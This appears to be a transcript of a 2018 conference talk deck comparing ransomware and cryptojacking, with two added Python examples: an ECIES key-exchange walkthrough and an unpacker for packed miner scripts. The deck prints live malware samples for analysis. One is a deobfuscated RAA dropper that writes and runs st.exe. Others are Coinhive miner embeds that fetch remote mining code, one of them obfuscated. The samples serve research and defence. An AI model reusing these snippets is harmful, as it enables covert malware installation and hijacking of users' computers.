
ToorCon XX: Ransomware versus Cryptojacking

Ransomware and cryptojacking have been recognized as the top malware threats in 2018. Financially motivated cybercriminals are attracted to both since both remain viable means of generating illicit income. In this talk, we delve deep into the latest characteristics observed in ransomware and cryptojacking attacks. Modern ransomware go beyond mere data encryption and come bundled with other threats, while cryptojacking attacks exploit unsuspecting web users by deploying embedded JavaScript miners concealed in websites. We discuss the intricate characteristics of sophisticated modern ransomware variants, cryptojacking attacks, and the results of our web crawl identifying websites involved in cryptojacking. Finally, we compare ransomware and cryptojacking in terms of their potential to generate illicit income for cybercriminals versus the levels of sophistication required to implement their respective campaigns.

Modern malware presents multi-faceted threats that leverage a variety of attack vectors. Leading the malware threatscape in 2018 are ransomware and cryptojacking attacks, and the more evolved variants are now implementing targeted attacks against organizations (e.g. SamSam). These modern ransomware include a hybrid cryptosystem that uses a combination of symmetric and asymmetric cryptography. In recent practice, ransomware are going beyond mere data encryption and come bundled with other threats. We present real-world cases of ransomware where we observed these cryptoviral extortions drop trojan horses (e.g. RAA dropping Pony) and cryptominers (e.g. BlackRuby). Our research shows that these secondary infections remain active on the host even after the ransom is paid. During this talk, we will also discuss how elliptic curve cryptography (ECIES) is deployed in modern ransomware (e.g. Petya and PetrWrap) and the tactical advantages it provides (over RSA) to ransomware operators. We will show how many ransomware variants purge shadow copies (via vssadmin), encrypt network backups (using WNetAddConnection2), and use the latest anti-virus circumvention techniques such as “process doppelganging” (e.g. SynAck ransomware). In addition, we will discuss the results of our preliminary web crawl that identified cryptojacking scripts embedded across a variety of websites. We will discuss just how cryptojacking works, why it is spreading so rapidly, how it affects organizations and individuals, and how to effectively protect an organization and its employees against it.

In conclusion, we will discuss the future of the most potent ransomware and cryptojacking malware as predicted via analysis of real-world malware samples recently observed in the wild. We will also explore new attack vectors (besides phishing) deployed by these malware, such as exploiting critical vulnerabilities (e.g. the infamous EternalBlue) or brute-forcing remote services (e.g. RDP or SSH). All arguments presented during the talk will be backed by empirical evidence in the form of system snapshots, code snippets, and network packet dumps collected from real-world malware.

Pranshu Bajpai

September 15, 2018

  1. Ransomware Versus Cryptojacking: Latest Trends in Modern Malware - Pranshu Bajpai

  2. @amirootyet

  3. 1. Introduction

  4. ~#whoami ↵
      Pranshu Bajpai
      • PhD candidate at Michigan State University
      • Security Researcher at SRG
      • Previously worked as an independent penetration tester
      • Active speaker at security conferences: DEFCON, GrrCon, ToorCon, BSides, APWG eCrime...
      https://twitter.com/amirootyet
      https://www.linkedin.com/in/pranshubajpai
      http://www.cse.msu.edu/~bajpaipr/
      Richard Enbody
      • Associate Professor at Michigan State University
      • Books: Targeted Cyber Attacks, The Practice of Computing using Python
      http://www.cse.msu.edu/~enbody/
  5. Ransomware: Die Hard!

  6. Defining characteristics of a ransomware
      1. Infiltrate
      2. Obtain encryption secret
      3. Encrypt files
      4. Demand ransom
  7. Hybrid encryption model
      ▣ Hybrid encryption
      ▣ A Key-Management-Based Taxonomy for Ransomware - Pranshu Bajpai, Aditya K Sood, Richard Enbody
        https://ieeexplore.ieee.org/document/8376213/
  8. 2. Trends in Ransomware

  9. Targeted ransomware attacks
      ▣ Not your run-of-the-mill spray-and-pray type infections
      ▣ Victims are carefully chosen
      ▣ Example: SamSam
      ◦ Attack vector: weakly secured RDP
      ◦ Privilege escalation
      ◦ Kill AV and infect
      ◦ $6 million and counting… (1MddNhqRCJe825ywjdbjbAQpstWBpKHmFR)
  10. Add a miner!
      ▣ Cryptojacking is on the rise
      ▣ Bundle a mining routine with the ransomware
      ▣ Examples: BlackRuby, Blue Blackmail (Obama-themed ransomware)
      Motivation
      ▣ Runs in the background while waiting for ransom
      ▣ Favorable to ransomware developers in the context of developing countries
      ▣ Something is better than nothing (ransom demand not met)
  11. Elliptic curve cryptography
      Motivation
      ▣ Better for marketing
      ▣ Not as closely scrutinized as RSA
  12. Elliptic curve cryptography
      ▣ Ransomware use the Elliptic Curve Integrated Encryption Scheme, or ECIES
      ▣ secp192k1 deployed in Petya
      ◦ Base point, G = 03DB4FF10EC057E9AE26B07D0280B7F4341DA5D1B1EAE06C7D
      ◦ Domain parameters and public key, P, ship with the ransomware
      ◦ Secret integer, s, is kept safe with the attacker
  13. ECIES
      Upon infection:
      ▣ Generate random integer, t (CryptGenRandom!)
      ▣ Q = [t]G
      ▣ h = H([t]P) (the encryption key!)
      ▣ Encrypt using h
      ▣ Purge t and h from host
      Upon receiving payment:
      ▣ Demand Q from victim
      ▣ [s]Q = [t]P (important property!)
      ▣ h = H([s]Q)
      ▣ Attacker sends h to victim
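The exchange on slides 12 and 13 carried through in Python, as an added walkthrough that is not part of the deck: the y-coordinate of G is the uncompressed form of the slide's base point as listed in SEC 2, and SHA-256 over the shared point's x-coordinate stands in for the unspecified H().

```python
import hashlib
import secrets
# secp192k1 (SEC 2): y^2 = x^3 + 3 over GF(p). G is the uncompressed form of the compressed
# base point 03DB4FF1... quoted on the slide; the y-coordinate is taken from SEC 2.
PRIME = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFEE37
ORDER = 0xFFFFFFFFFFFFFFFFFFFFFFFE26F2FC170F69466A74DEFD8D
G = (0xDB4FF10EC057E9AE26B07D0280B7F4341DA5D1B1EAE06C7D,
     0x9B2F2F6D9C5628A7844163D015BE86344082AA88D95E2F9D)

def on_curve(pt):
    return (pt[1] ** 2 - pt[0] ** 3 - 3) % PRIME == 0

def add(p1, p2):
    # Affine group law for a = 0; None stands for the point at infinity.
    if p1 is None or p2 is None:
        return p1 if p2 is None else p2
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % PRIME == 0:
        return None
    if p1 == p2:
        lam = 3 * x1 * x1 * pow(2 * y1, -1, PRIME) % PRIME
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, PRIME) % PRIME
    x3 = (lam * lam - x1 - x2) % PRIME
    return (x3, (lam * (x1 - x3) - y1) % PRIME)

def mul(k, pt):
    # Scalar multiplication [k]pt by double-and-add.
    acc = None
    while k:
        if k & 1:
            acc = add(acc, pt)
        pt = add(pt, pt)
        k >>= 1
    return acc

def kdf(pt):
    # H(): derive the file key from the shared point's x-coordinate (SHA-256 assumed for illustration).
    return hashlib.sha256(pt[0].to_bytes(24, "big")).digest()

def ecies_key_exchange(s=None, t=None):
    # Walks the protocol on the slide; returns the key each side derives.
    s = s or secrets.randbelow(ORDER - 1) + 1   # attacker's secret integer, never on the host
    pub = mul(s, G)                             # P, ships with the ransomware
    t = t or secrets.randbelow(ORDER - 1) + 1   # victim-side random integer (CryptGenRandom)
    q = mul(t, G)                               # Q, the only thing the victim keeps for the ransom note
    h_victim = kdf(mul(t, pub))                 # h = H([t]P) encrypts files; t and h are then purged
    h_attacker = kdf(mul(s, q))                 # after payment: H([s]Q) = H([t]P) since [s]Q = [s][t]G
    return h_victim, h_attacker
```

Once t and h are purged, the host holds only Q and P, and nothing on it reproduces h without s; that is the property [s]Q = [t]P the scheme hinges on, and why a key recovered from memory has to be captured before the purge.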
  14. Purge backups
      ▣ Backups
      ◦ Mapped drive on network
      ◦ Windows Shadow Volume copies
      ◦ Cloud storage (OneDrive, Google Drive…)
      ▣ Ransomware
      ◦ Explicitly hunt for and encrypt network shares
      ◦ Purge VSS files on host
      ◦ Abuse sync clients of cloud storage services to encrypt files stored in the cloud
  15. Purging VSS files: SamSam ransomware quietly deletes shadow copies
  16. Mapping network shares: WNetAddConnection is used to map network shares on Windows
  17. Dropping spyware
      function NWvQtGjjfQX() {
        var data_pn = "TVrDiQNMSFE(...)QQURE";
        var cmd = "U2FsdGVkX1/LHQl+aIAo/hXHDEI5YmZZtBIcL...";
        var dec_cmd = CryptoJS.AES.decrypt(cmd, key_cmd);
        dec_cmd = CryptoJS.enc.Utf8.stringify(dec_cmd);
        eval(dec_cmd);
        return 0;
      }
      ...
      // decrypts to the following code
      // ...
      var flo = new ActiveXObject("ADODB.Stream");
      var runer = WScript.CreateObject("WScript.Shell");
      var wher = runer.SpecialFolders("MyDocuments");
      wher = wher + "\\" + "st.exe";
      flo.CharSet = "437";
      flo.Open();
      var pny = data_pn.replace(/NMSIOP/g, "A");
      var pny_ar = CryptoJS.enc.Base64.parse(pny);
      var pny_dec = pny_ar.toString(CryptoJS.enc.Utf8);
      flo.Position = 0;
      flo.SetEOS;
      flo.WriteText(pny_dec);
      flo.SaveToFile(wher, 2);
      flo.Close;
      wher = "\"" + wher + "\"";
      runer.Run(wher);
  18. Dropping spyware: RAA ransomware dropping Pony

  19. Attack vectors
      ▣ Social engineering has been the predominant attack vector
      ▣ Relies on exploiting human gullibility
      ▣ Attackers are moving on to more efficient attack vectors
      ▣ WannaCry and NotPetya exploited EternalBlue
      ▣ SamSam exploits weakly secured RDP
      ▣ Weakly secured SSH
      ▣ More to come…
  20. WannaCry scans port 445

  21. 3. Cryptojacking

  22. Bitcoin made ransomware possible; Monero made cryptojacking possible.

  23. About cryptojacking, aka drive-by mining
      ▣ Unauthorized use of processing power to mine cryptocurrencies
      ▣ Offshoot of the rise in valuation of cryptocurrencies
      ▣ Preying on the general lack of awareness about cryptojacking
      ▣ Easy to pull off using an available JavaScript miner
      ▣ Subtle and hard to detect by the average computer user
      ▣ Does not need specialized hardware anymore: the average CPU is good enough
  24. The problem with cryptojacking
      ▣ Immediate problem
      ◦ Cost of electrical power
      ▣ Long-term concern
      ◦ Electromigration damaging the processor
      ▣ Extreme case scenario
      ◦ Processor catching fire
  25. Types of cryptojacking
      ▣ Install a mining application on the host
      ◦ Trick the user into installing one
      ◦ Exploit a vulnerability and install one (RedisWannaMine)
      ▣ JavaScript-based miners
      ◦ Lure victims to a webpage that runs an embedded JS miner
      ◦ Inject mining scripts into ad networks that legitimate websites then serve to their visitors
  26. 4. Cryptojacking on the Web

  27. Example of a JS-based mining script
      <script src='https://coinhive.com/lib/coinhive.min.js'></script>
      <script>
        var miner = new CoinHive.User('BQey5NM18Qz6T1Xak3QNJNxpp3uFUg4m', 'hexm4n');
        miner.start();
      </script>
  28. Example of a JS-based mining script

  29. Impact on system resources

  30. Cryptojacking on the Internet (preliminary analysis)
      ▣ Crawl the web looking for unauthorized Coinhive miners
      ◦ publicwww, nerdydata, censys
      ▣ How do we determine the "unauthorized" part?
      ▣ How do we validate the results?
      ◦ Some websites are now unavailable
      ◦ Some websites have now cleaned the source code
      ▣ How do we get around code obfuscation?
  31. Code obfuscation

  32. Deobfuscation
      eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$.9("a://b-8.6/2/3.7.4",c(){h 1=d l.j(\'i\',{e:f,g:0.5});1.k()});',22,22,'|mm|lib|coinhive|js||com|min|hive|getScript|https|coin|function|new|autoThreads|false|throttle|var|y0wAs4sRdgKE3ND7isH5yY9ggozmW1wk|Anonymous|start|CoinHive'.split('|'),0,{}))

      Unpacked:
      $.getScript("https://coin-hive.com/lib/coinhive.min.js", function() {
        var mm = new CoinHive.Anonymous('y0wAs4sRdgKE3ND7isH5yY9ggozmW1wk', { autoThreads: false, throttle: 0.5 });
        mm.start()
      });
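A Python unpacker for the p,a,c,k,e,d loader on this slide, added here as an example that is not part of the deck: the packed string is the slide's own (with the line-wrap space inside the site key removed), while the wrapper regex and the marker list a crawler would look for afterwards are assumptions of this example.

```python
import re

# The packed loader from the slide, kept as shown except that the line-wrap space
# inside the site key (y0wAs4 sRdg...) has been removed.
PACKED_JS = (
    "eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};"
    "if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}"
    "k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};"
    "while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}return p}"
    "('$.9(\"a://b-8.6/2/3.7.4\",c(){h 1=d l.j(\\'i\\',{e:f,g:0.5});1.k()});',22,22,"
    "'|mm|lib|coinhive|js||com|min|hive|getScript|https|coin|function|new|autoThreads|"
    "false|throttle|var|y0wAs4sRdgKE3ND7isH5yY9ggozmW1wk|Anonymous|start|CoinHive'"
    ".split('|'),0,{}))"
)

# Matches the packer's trailing call: }('payload', radix, count, 'k|e|y|s'.split('|'), ...)
CALL = re.compile(r"\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\)")
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"

def to_base(n, radix):
    # Mirror of JavaScript's Number.prototype.toString(radix) for radix <= 36.
    out = ""
    while True:
        out = DIGITS[n % radix] + out
        n //= radix
        if n == 0:
            return out

def unpack(payload, radix, count, keywords):
    # The packer replaced every word keywords[c] with the token e(c); this rebuilds the
    # dictionary d and swaps every whole-word token back, exactly as the loader does at runtime.
    table = {to_base(c, radix): keywords[c] or to_base(c, radix) for c in range(count)}
    return re.sub(r"\w+", lambda m: table.get(m.group(0), m.group(0)), payload)

def unpack_eval(js):
    # Pull payload, radix, count and keyword list out of the eval(...) wrapper, then unpack.
    m = CALL.search(js)
    if m is None:
        raise ValueError("not a p,a,c,k,e,d packed script")
    payload = m.group(1).encode().decode("unicode_escape")   # undo \' escapes in the literal
    return unpack(payload, int(m.group(2)), int(m.group(3)), m.group(4).split("|"))

# Strings a crawler can look for once the loader is unpacked (assumed marker list, not the deck's).
MINER_MARKERS = ("coinhive.min.js", "coin-hive.com", "CoinHive.Anonymous", "CoinHive.User")

def miner_markers(script):
    return [marker for marker in MINER_MARKERS if marker in script]
```

None of the markers appear in the packed form, which is the crawl problem the slide raises: a plain string match on the page source misses this loader until it is unpacked.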
  33. Crawl results analysis
      ▣ Identified 212 websites involved in cryptojacking
      ▣ Resolve websites to “categories”
      ◦ Pornography? Business? IT? Malicious?
      ◦ Use the FortiGuard web filter categories:
        ▪ https://fortiguard.com/webfilter/categories
  34. Cryptojacking website categories

  35. Geographic distribution

  36. Discussion
      ▣ Many cryptojacking websites are involved in other dubious practices
      ◦ Illegal video content
      ◦ Pirated software and games
      ◦ Distributing malware
      ◦ ...
      ▣ Streaming media websites provide the best opportunity for cryptojacking
  37. IoT Cryptojacking
      ▣ Why?
      ◦ Why not?
      ▣ Relevant factors
      ◦ Gaining initial entry
        ▪ IoT devices are usually more vulnerable
      ◦ Profit potential
        ▪ Do IoT devices today have enough computation power?
  38. Cryptojacking economics (processing power)
      Device                    Hashes/s
      i7 processor              150
      Amazon Firestick          5
      Samsung Galaxy S9         25
      Samsung Galaxy Gear S3    0.4
  39. Cryptojacking economics (Monero valuation with time): https://www.coingecko.com/en/price_charts/monero/usd

  40. Real concern
      ▣ Cleverer cryptojacking attacks
      ◦ Improved attack vectors
      ◦ Stealthy mining using only part of the CPU
      ◦ Google Play and App Store apps that mine in the background
  41. Protection against cryptojacking
      ▣ Update!
      ▣ Use antivirus solutions
      ▣ User awareness
      ▣ Monitor system resources (CPU consumption)
      ▣ Install browser extensions that block mining scripts
      ▣ NoScript
  42. Conclusion
      Ransomware
      ▣ Intricate cryptographic acrobatics
      ▣ No ransom guarantees after infection
      ▣ Ransomware is known to the average user
      ▣ Noisy ransom notes
      ▣ OS dependent
      Cryptojacking
      ▣ Relatively straightforward
      ▣ Cryptocurrency already mined or stolen is guaranteed money
      ▣ Cryptojacking is still a very new concept
      ▣ Covert long-term mining
      ▣ OS independent
  43. Thank You! @amirootyet